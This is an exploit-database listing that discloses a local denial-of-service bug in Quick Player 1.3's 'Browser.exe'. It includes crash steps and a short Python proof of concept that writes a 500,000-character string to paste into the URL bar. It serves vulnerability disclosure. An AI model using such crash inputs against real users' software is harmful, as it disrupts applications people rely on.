Quick Player 1.3 Denial Of Service

2020.06.06

Credit: Felipe Winsnes

Risk: Low

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

# Exploit Title: Quick Player 1.3 - 'Browser.exe' Denial of Service
# Date: 06/05/2020
# Author: Felipe Winsnes
# Software Link: http://download.cnet.com/Quick-Player/3640-2168_4-10871418.html
# Version: 1.3
# Tested on: Windows 7
# Proof of Concept:
# 1.- Run the python script "poc.py", it will create a new file "poc.txt"
# 2.- Open the application "Browser.exe"
# 3.- Paste the contents of "poc.txt" within the url bar
# 4.- Crashed
# Blog where the vulnerability is discussed: https://whitecr0wz.github.io/posts/Quick-Player-Browser-dos/
# Direct proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings7/2.gif
buffer = "A" * 500000
f = open ("poc.txt", "w")
f.write(buffer)
f.close()

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Quick Player 1.3 Denial Of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.